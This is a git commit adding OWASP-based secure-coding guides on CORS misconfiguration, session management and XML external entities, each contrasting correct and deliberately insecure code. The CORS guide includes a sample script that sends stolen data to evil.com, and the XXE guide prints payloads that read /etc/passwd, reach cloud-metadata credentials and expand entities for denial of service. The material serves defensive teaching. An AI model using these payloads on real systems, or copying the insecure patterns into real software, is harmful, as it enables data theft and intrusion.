Add session management, CORS, XXE patterns
Complete the security patterns collection: - session-management.md: fixation, hijacking, secure cookies, concurrent sessions - cors.md: origin validation, reflected origin attacks, preflight caching - xxe.md: external entities, DTD attacks, language-specific fixes Now 19 patterns covering comprehensive web application security.
This commit is contained in:
@@ -20,13 +20,14 @@ Based on OWASP Top 10:2025 and recent security research.
|
||||
| [audit-logging.md](audit-logging.md) | What to log, what not to log | A09 |
|
||||
| [error-handling.md](error-handling.md) | Fail closed, no sensitive info in errors | A10 |
|
||||
|
||||
### Identity
|
||||
### Identity & Session
|
||||
|
||||
| File | Topic | OWASP 2025 |
|
||||
|------|-------|------------|
|
||||
| [authentication.md](authentication.md) | Passwords, tokens, MFA, brute force protection | A07 |
|
||||
| [authorization.md](authorization.md) | Permission checks, IDOR prevention, privilege escalation | A01 |
|
||||
| [jwt-security.md](jwt-security.md) | Algorithm confusion, weak secrets, expiration | A07 |
|
||||
| [session-management.md](session-management.md) | Session fixation, hijacking, secure cookies | A07 |
|
||||
|
||||
### Attack Prevention
|
||||
|
||||
@@ -34,10 +35,12 @@ Based on OWASP Top 10:2025 and recent security research.
|
||||
|------|-------|------------|
|
||||
| [injection-prevention.md](injection-prevention.md) | SQL, command, template, path traversal | A05 |
|
||||
| [ssrf.md](ssrf.md) | Server-side request forgery, metadata endpoints | A10 |
|
||||
| [xxe.md](xxe.md) | XML external entities, DTD attacks | A05 |
|
||||
| [dos-prevention.md](dos-prevention.md) | Rate limiting, resource bounds, algorithmic complexity | — |
|
||||
| [prompt-injection.md](prompt-injection.md) | LLM security, data/instruction separation | — |
|
||||
| [deserialization.md](deserialization.md) | Untrusted data deserialization, pickle, yaml | A08 |
|
||||
| [race-conditions.md](race-conditions.md) | TOCTOU, atomic check-and-act, database locks | — |
|
||||
| [cors.md](cors.md) | Origin validation, credential handling | A01 |
|
||||
|
||||
### Infrastructure
|
||||
|
||||
@@ -50,13 +53,13 @@ Based on OWASP Top 10:2025 and recent security research.
|
||||
|
||||
| # | Category | Pattern |
|
||||
|---|----------|---------|
|
||||
| A01 | Broken Access Control | authorization.md |
|
||||
| A01 | Broken Access Control | authorization.md, cors.md |
|
||||
| A02 | Security Misconfiguration | secure-defaults.md |
|
||||
| A03 | Software Supply Chain Failures | supply-chain.md |
|
||||
| A04 | Cryptographic Failures | cryptography.md |
|
||||
| A05 | Injection | injection-prevention.md |
|
||||
| A05 | Injection | injection-prevention.md, xxe.md |
|
||||
| A06 | Insecure Design | secure-defaults.md |
|
||||
| A07 | Authentication Failures | authentication.md, jwt-security.md |
|
||||
| A07 | Authentication Failures | authentication.md, jwt-security.md, session-management.md |
|
||||
| A08 | Software or Data Integrity Failures | deserialization.md |
|
||||
| A09 | Security Logging and Alerting Failures | audit-logging.md |
|
||||
| A10 | Mishandling of Exceptional Conditions | error-handling.md, ssrf.md |
|
||||
|
||||
@@ -0,0 +1,183 @@
|
||||
# CORS Misconfiguration
|
||||
|
||||
## Rule
|
||||
|
||||
Never reflect Origin blindly. Allowlist specific origins. Don't use credentials with wildcards.
|
||||
|
||||
**Source:** [OWASP CORS Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)
|
||||
|
||||
## CORS Basics
|
||||
|
||||
Browser blocks cross-origin requests by default. CORS headers selectively allow them:
|
||||
|
||||
| Header | Purpose |
|
||||
|--------|---------|
|
||||
| `Access-Control-Allow-Origin` | Which origins can access |
|
||||
| `Access-Control-Allow-Credentials` | Allow cookies/auth |
|
||||
| `Access-Control-Allow-Methods` | Allowed HTTP methods |
|
||||
| `Access-Control-Allow-Headers` | Allowed request headers |
|
||||
|
||||
## Correct Pattern
|
||||
|
||||
```python
|
||||
from flask import Flask, request
|
||||
|
||||
ALLOWED_ORIGINS = {
|
||||
"https://app.example.com",
|
||||
"https://admin.example.com",
|
||||
}
|
||||
|
||||
def add_cors_headers(response):
|
||||
origin = request.headers.get("Origin")
|
||||
|
||||
# Validate against allowlist
|
||||
if origin in ALLOWED_ORIGINS:
|
||||
response.headers["Access-Control-Allow-Origin"] = origin
|
||||
response.headers["Access-Control-Allow-Credentials"] = "true"
|
||||
response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE"
|
||||
response.headers["Access-Control-Allow-Headers"] = "Content-Type, Authorization"
|
||||
response.headers["Vary"] = "Origin" # Important for caching!
|
||||
|
||||
return response
|
||||
|
||||
# For public APIs without credentials
|
||||
def add_public_cors(response):
|
||||
response.headers["Access-Control-Allow-Origin"] = "*"
|
||||
# Note: credentials CANNOT be used with wildcard
|
||||
response.headers["Access-Control-Allow-Methods"] = "GET"
|
||||
return response
|
||||
|
||||
# Handle preflight requests
|
||||
@app.route("/api/<path:path>", methods=["OPTIONS"])
|
||||
def preflight(path):
|
||||
response = make_response()
|
||||
return add_cors_headers(response)
|
||||
```
|
||||
|
||||
## Incorrect Pattern
|
||||
|
||||
```python
|
||||
# Wrong: reflect any origin (allows any site to access)
|
||||
@app.after_request
|
||||
def bad_cors(response):
|
||||
origin = request.headers.get("Origin")
|
||||
response.headers["Access-Control-Allow-Origin"] = origin # Reflected!
|
||||
response.headers["Access-Control-Allow-Credentials"] = "true"
|
||||
return response
|
||||
# Attack: evil.com can now make authenticated requests
|
||||
|
||||
# Wrong: wildcard with credentials
|
||||
response.headers["Access-Control-Allow-Origin"] = "*"
|
||||
response.headers["Access-Control-Allow-Credentials"] = "true"
|
||||
# Browser will reject, but shows misunderstanding
|
||||
|
||||
# Wrong: regex bypass
|
||||
def check_origin(origin):
|
||||
return origin.endswith(".example.com")
|
||||
# Bypassed by: attacker-example.com
|
||||
|
||||
# Wrong: null origin allowed
|
||||
ALLOWED_ORIGINS = {"https://app.example.com", "null"}
|
||||
# "null" origin sent by sandboxed iframes, file:// URLs - attacker controlled!
|
||||
|
||||
# Wrong: substring match
|
||||
def check_origin(origin):
|
||||
return "example.com" in origin
|
||||
# Bypassed by: example.com.evil.com
|
||||
```
|
||||
|
||||
## Origin Validation
|
||||
|
||||
```python
|
||||
from urllib.parse import urlparse
|
||||
|
||||
ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}
|
||||
|
||||
def is_valid_origin(origin: str) -> bool:
|
||||
"""Strict origin validation."""
|
||||
if not origin:
|
||||
return False
|
||||
|
||||
# Never allow null
|
||||
if origin == "null":
|
||||
return False
|
||||
|
||||
# Exact match against allowlist
|
||||
if origin in ALLOWED_ORIGINS:
|
||||
return True
|
||||
|
||||
# If you need subdomain matching, be careful:
|
||||
try:
|
||||
parsed = urlparse(origin)
|
||||
# Must be HTTPS
|
||||
if parsed.scheme != "https":
|
||||
return False
|
||||
|
||||
# Exact domain match (not suffix!)
|
||||
allowed_domains = {"app.example.com", "admin.example.com"}
|
||||
if parsed.netloc in allowed_domains:
|
||||
return True
|
||||
|
||||
# Subdomain of specific parent (careful!)
|
||||
if parsed.netloc.endswith(".trusted.example.com"):
|
||||
# Verify it's actually a subdomain, not suffix attack
|
||||
parts = parsed.netloc.split(".")
|
||||
if len(parts) >= 4 and parts[-3:] == ["trusted", "example", "com"]:
|
||||
return True
|
||||
except Exception:
|
||||
return False
|
||||
|
||||
return False
|
||||
```
|
||||
|
||||
## Attack Scenarios
|
||||
|
||||
```python
|
||||
# Scenario 1: Data theft via reflected origin
|
||||
#
|
||||
# Vulnerable server reflects any Origin with credentials
|
||||
#
|
||||
# Attacker's evil.com:
|
||||
# <script>
|
||||
# fetch("https://api.victim.com/user/profile", {
|
||||
# credentials: "include"
|
||||
# })
|
||||
# .then(r => r.json())
|
||||
# .then(data => {
|
||||
# // Send stolen data to attacker
|
||||
# fetch("https://evil.com/steal?data=" + JSON.stringify(data))
|
||||
# })
|
||||
# </script>
|
||||
|
||||
# Scenario 2: CSRF via CORS
|
||||
#
|
||||
# If CORS allows credentials from evil.com,
|
||||
# evil.com can make authenticated state-changing requests
|
||||
```
|
||||
|
||||
## Preflight Caching
|
||||
|
||||
```python
|
||||
@app.after_request
|
||||
def cors_headers(response):
|
||||
origin = request.headers.get("Origin")
|
||||
if origin in ALLOWED_ORIGINS:
|
||||
response.headers["Access-Control-Allow-Origin"] = origin
|
||||
response.headers["Access-Control-Allow-Credentials"] = "true"
|
||||
response.headers["Access-Control-Max-Age"] = "86400" # Cache preflight 24h
|
||||
response.headers["Vary"] = "Origin" # CRITICAL for caching
|
||||
return response
|
||||
|
||||
# Why Vary: Origin matters:
|
||||
# Without it, CDN might cache response for origin A
|
||||
# Then serve that cached response to origin B (wrong ACAO header!)
|
||||
```
|
||||
|
||||
## Edge Cases
|
||||
|
||||
- WebSocket connections don't use CORS (use Origin header manually)
|
||||
- `Access-Control-Expose-Headers` needed for custom response headers
|
||||
- Preflight not sent for "simple" requests (GET, POST with basic headers)
|
||||
- Internal APIs should still validate Origin (defense in depth)
|
||||
- Browser extensions can bypass CORS (not a vulnerability)
|
||||
- Server-to-server requests don't involve CORS
|
||||
@@ -0,0 +1,185 @@
|
||||
# Session Management
|
||||
|
||||
## Rule
|
||||
|
||||
Generate unpredictable session IDs. Bind sessions to users. Expire aggressively. Regenerate on privilege change.
|
||||
|
||||
**Source:** [OWASP Session Management Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)
|
||||
|
||||
## Session Attacks
|
||||
|
||||
| Attack | Description | Defense |
|
||||
|--------|-------------|---------|
|
||||
| Session fixation | Attacker sets victim's session ID | Regenerate on login |
|
||||
| Session hijacking | Steal session via XSS/network | httpOnly, Secure flags |
|
||||
| Session prediction | Guess valid session IDs | Cryptographic randomness |
|
||||
| Session replay | Reuse captured session | Short expiration, binding |
|
||||
|
||||
## Correct Pattern
|
||||
|
||||
```python
|
||||
import secrets
|
||||
from datetime import datetime, timedelta
|
||||
from flask import session, request
|
||||
|
||||
# Generate cryptographically secure session ID
|
||||
def generate_session_id() -> str:
|
||||
return secrets.token_urlsafe(32) # 256 bits of entropy
|
||||
|
||||
# Session configuration
|
||||
SESSION_CONFIG = {
|
||||
"cookie_name": "__Host-session", # __Host- prefix enforces Secure + no Domain
|
||||
"httponly": True, # Not accessible to JavaScript
|
||||
"secure": True, # HTTPS only
|
||||
"samesite": "Lax", # CSRF protection
|
||||
"max_age": 3600, # 1 hour max
|
||||
}
|
||||
|
||||
# Regenerate session on privilege change
|
||||
def login(user: User, password: str) -> bool:
|
||||
if not verify_password(user, password):
|
||||
return False
|
||||
|
||||
# CRITICAL: regenerate session ID to prevent fixation
|
||||
session.regenerate()
|
||||
|
||||
session["user_id"] = user.id
|
||||
session["login_time"] = datetime.utcnow().isoformat()
|
||||
session["ip"] = request.remote_addr
|
||||
session["user_agent"] = request.user_agent.string
|
||||
|
||||
return True
|
||||
|
||||
def logout():
|
||||
# Invalidate server-side, not just client cookie
|
||||
session_id = session.get("_id")
|
||||
if session_id:
|
||||
invalidate_session_server_side(session_id)
|
||||
session.clear()
|
||||
|
||||
# Validate session binding
|
||||
def validate_session() -> bool:
|
||||
if "user_id" not in session:
|
||||
return False
|
||||
|
||||
# Check session age
|
||||
login_time = datetime.fromisoformat(session.get("login_time", ""))
|
||||
if datetime.utcnow() - login_time > timedelta(hours=8):
|
||||
logout()
|
||||
return False
|
||||
|
||||
# Optional: bind to IP (careful with mobile/proxies)
|
||||
# if session.get("ip") != request.remote_addr:
|
||||
# logout()
|
||||
# return False
|
||||
|
||||
return True
|
||||
```
|
||||
|
||||
## Incorrect Pattern
|
||||
|
||||
```python
|
||||
import random
|
||||
import hashlib
|
||||
|
||||
# Wrong: predictable session ID
|
||||
def bad_session_id():
|
||||
return str(random.randint(1000000, 9999999))
|
||||
|
||||
# Wrong: sequential session ID
|
||||
COUNTER = 0
|
||||
def bad_session_id_2():
|
||||
global COUNTER
|
||||
COUNTER += 1
|
||||
return str(COUNTER)
|
||||
|
||||
# Wrong: user-derived session ID
|
||||
def bad_session_id_3(user_id):
|
||||
return hashlib.md5(str(user_id).encode()).hexdigest()
|
||||
|
||||
# Wrong: no regeneration on login (session fixation)
|
||||
def bad_login(user, password):
|
||||
if verify_password(user, password):
|
||||
session["user_id"] = user.id # Same session ID!
|
||||
return True
|
||||
return False
|
||||
|
||||
# Wrong: client-side only logout
|
||||
def bad_logout():
|
||||
return redirect("/", headers={"Set-Cookie": "session=; Max-Age=0"})
|
||||
# Session still valid server-side!
|
||||
|
||||
# Wrong: missing cookie security flags
|
||||
app.config["SESSION_COOKIE_HTTPONLY"] = False # XSS can steal
|
||||
app.config["SESSION_COOKIE_SECURE"] = False # Sent over HTTP
|
||||
```
|
||||
|
||||
## Session Fixation Attack
|
||||
|
||||
```python
|
||||
# Attack scenario:
|
||||
# 1. Attacker visits site, gets session ID "abc123"
|
||||
# 2. Attacker sends victim link: https://site.com/?sessionid=abc123
|
||||
# 3. Victim clicks, their browser now uses "abc123"
|
||||
# 4. Victim logs in (session ID unchanged!)
|
||||
# 5. Attacker uses "abc123" - now authenticated as victim
|
||||
|
||||
# Defense: ALWAYS regenerate on login
|
||||
@app.route("/login", methods=["POST"])
|
||||
def login():
|
||||
if authenticate(request.form):
|
||||
session.regenerate() # New session ID
|
||||
session["authenticated"] = True
|
||||
return redirect("/")
|
||||
```
|
||||
|
||||
## Concurrent Session Control
|
||||
|
||||
```python
|
||||
# Limit active sessions per user
|
||||
MAX_SESSIONS_PER_USER = 3
|
||||
|
||||
def create_session(user_id: str) -> str:
|
||||
# Get existing sessions
|
||||
existing = Session.query.filter_by(user_id=user_id).order_by(
|
||||
Session.created_at.asc()
|
||||
).all()
|
||||
|
||||
# Remove oldest if at limit
|
||||
if len(existing) >= MAX_SESSIONS_PER_USER:
|
||||
oldest = existing[0]
|
||||
oldest.delete()
|
||||
# Optionally notify user: "Logged out of oldest session"
|
||||
|
||||
# Create new session
|
||||
session_id = generate_session_id()
|
||||
Session.create(
|
||||
id=session_id,
|
||||
user_id=user_id,
|
||||
created_at=datetime.utcnow(),
|
||||
ip=request.remote_addr
|
||||
)
|
||||
return session_id
|
||||
|
||||
# Allow user to view/revoke sessions
|
||||
@app.route("/settings/sessions")
|
||||
def list_sessions():
|
||||
sessions = Session.query.filter_by(user_id=current_user.id).all()
|
||||
return render_template("sessions.html", sessions=sessions)
|
||||
|
||||
@app.route("/settings/sessions/<session_id>/revoke", methods=["POST"])
|
||||
def revoke_session(session_id):
|
||||
session = Session.query.get(session_id)
|
||||
if session and session.user_id == current_user.id:
|
||||
session.delete()
|
||||
return redirect("/settings/sessions")
|
||||
```
|
||||
|
||||
## Edge Cases
|
||||
|
||||
- Mobile apps: use short-lived access tokens, not sessions
|
||||
- "Remember me": separate long-lived token, not extended session
|
||||
- Password change should invalidate all other sessions
|
||||
- Admin impersonation needs audit trail
|
||||
- Idle timeout vs absolute timeout (both needed)
|
||||
- Session data size limits (don't store large objects)
|
||||
@@ -0,0 +1,181 @@
|
||||
# XML External Entities (XXE)
|
||||
|
||||
## Rule
|
||||
|
||||
Disable external entity processing. Disable DTDs. Use safe parser defaults.
|
||||
|
||||
**Source:** [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
|
||||
|
||||
## What XXE Can Do
|
||||
|
||||
- **File disclosure**: Read `/etc/passwd`, config files, source code
|
||||
- **SSRF**: Make requests to internal services
|
||||
- **DoS**: Billion laughs attack (exponential entity expansion)
|
||||
- **Port scanning**: Error-based probing of internal ports
|
||||
- **RCE**: In some configurations (PHP expect://)
|
||||
|
||||
## Attack Payloads
|
||||
|
||||
```xml
|
||||
<!-- File disclosure -->
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ENTITY xxe SYSTEM "file:///etc/passwd">
|
||||
]>
|
||||
<data>&xxe;</data>
|
||||
|
||||
<!-- SSRF to cloud metadata -->
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
|
||||
]>
|
||||
<data>&xxe;</data>
|
||||
|
||||
<!-- Billion laughs DoS -->
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE lolz [
|
||||
<!ENTITY lol "lol">
|
||||
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
|
||||
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
|
||||
<!-- ... continues exponentially -->
|
||||
]>
|
||||
<lolz>&lol9;</lolz>
|
||||
```
|
||||
|
||||
## Correct Pattern
|
||||
|
||||
```python
|
||||
# Python - defusedxml (recommended)
|
||||
import defusedxml.ElementTree as ET
|
||||
|
||||
def parse_xml_safe(xml_string: str):
|
||||
"""Parse XML with XXE protection."""
|
||||
return ET.fromstring(xml_string)
|
||||
|
||||
# Python - standard library with safe settings
|
||||
from xml.etree.ElementTree import XMLParser, parse
|
||||
import xml.etree.ElementTree as ET
|
||||
|
||||
def parse_xml_manual(xml_string: str):
|
||||
"""Manual safe configuration."""
|
||||
parser = ET.XMLParser()
|
||||
# Python's ElementTree doesn't resolve external entities by default
|
||||
# But always verify your specific library!
|
||||
return ET.fromstring(xml_string, parser=parser)
|
||||
|
||||
# lxml with safe settings
|
||||
from lxml import etree
|
||||
|
||||
def parse_xml_lxml(xml_string: str):
|
||||
"""lxml with XXE disabled."""
|
||||
parser = etree.XMLParser(
|
||||
resolve_entities=False,
|
||||
no_network=True,
|
||||
dtd_validation=False,
|
||||
load_dtd=False,
|
||||
)
|
||||
return etree.fromstring(xml_string.encode(), parser=parser)
|
||||
```
|
||||
|
||||
## Incorrect Pattern
|
||||
|
||||
```python
|
||||
from lxml import etree
|
||||
|
||||
# Wrong: default lxml settings allow XXE
|
||||
def bad_parse(xml_string: str):
|
||||
return etree.fromstring(xml_string)
|
||||
|
||||
# Wrong: explicitly enabling dangerous features
|
||||
def bad_parse_2(xml_string: str):
|
||||
parser = etree.XMLParser(resolve_entities=True)
|
||||
return etree.fromstring(xml_string, parser=parser)
|
||||
|
||||
# Wrong: using xml.dom.minidom without protection
|
||||
from xml.dom.minidom import parseString
|
||||
def bad_parse_3(xml_string: str):
|
||||
return parseString(xml_string) # May be vulnerable
|
||||
|
||||
# Wrong: SAX parser without disabling features
|
||||
import xml.sax
|
||||
def bad_parse_4(xml_string: str):
|
||||
handler = MyHandler()
|
||||
xml.sax.parseString(xml_string, handler)
|
||||
```
|
||||
|
||||
## Language-Specific Fixes
|
||||
|
||||
### Java
|
||||
|
||||
```java
|
||||
// DocumentBuilderFactory
|
||||
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
|
||||
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
|
||||
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
|
||||
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
|
||||
dbf.setXIncludeAware(false);
|
||||
dbf.setExpandEntityReferences(false);
|
||||
|
||||
// SAXParserFactory
|
||||
SAXParserFactory spf = SAXParserFactory.newInstance();
|
||||
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
|
||||
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
|
||||
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
|
||||
```
|
||||
|
||||
### .NET
|
||||
|
||||
```csharp
|
||||
// XmlReader (safe by default in .NET 4.5.2+)
|
||||
XmlReaderSettings settings = new XmlReaderSettings();
|
||||
settings.DtdProcessing = DtdProcessing.Prohibit;
|
||||
settings.XmlResolver = null;
|
||||
XmlReader reader = XmlReader.Create(stream, settings);
|
||||
|
||||
// XmlDocument
|
||||
XmlDocument doc = new XmlDocument();
|
||||
doc.XmlResolver = null; // Disable external resources
|
||||
doc.LoadXml(xmlString);
|
||||
```
|
||||
|
||||
### PHP
|
||||
|
||||
```php
|
||||
// Disable entity loading globally
|
||||
libxml_disable_entity_loader(true);
|
||||
|
||||
// Use LIBXML options
|
||||
$doc = new DOMDocument();
|
||||
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);
|
||||
// Actually, better to just not use those flags:
|
||||
$doc->loadXML($xml, LIBXML_NONET);
|
||||
```
|
||||
|
||||
## When You Need DTDs
|
||||
|
||||
```python
|
||||
# If you absolutely need DTD validation (rare):
|
||||
# 1. Allowlist specific DTDs
|
||||
# 2. Fetch DTDs from local filesystem only
|
||||
# 3. Never allow user-controlled DTD URLs
|
||||
|
||||
ALLOWED_DTDS = {
|
||||
"-//W3C//DTD XHTML 1.0 Strict//EN": "/path/to/local/xhtml1-strict.dtd"
|
||||
}
|
||||
|
||||
class SafeResolver(etree.Resolver):
|
||||
def resolve(self, system_url, public_id, context):
|
||||
if public_id in ALLOWED_DTDS:
|
||||
return self.resolve_filename(ALLOWED_DTDS[public_id], context)
|
||||
raise ValueError(f"DTD not allowed: {public_id}")
|
||||
```
|
||||
|
||||
## Edge Cases
|
||||
|
||||
- SVG files are XML — validate uploads!
|
||||
- SOAP/XML-RPC endpoints are XXE targets
|
||||
- Office documents (DOCX, XLSX) contain XML
|
||||
- Configuration files (Maven pom.xml, Spring beans.xml)
|
||||
- RSS/Atom feeds
|
||||
- SAML assertions
|
||||
- Blind XXE (out-of-band data exfiltration via DNS/HTTP)
|
||||
Reference in New Issue
Block a user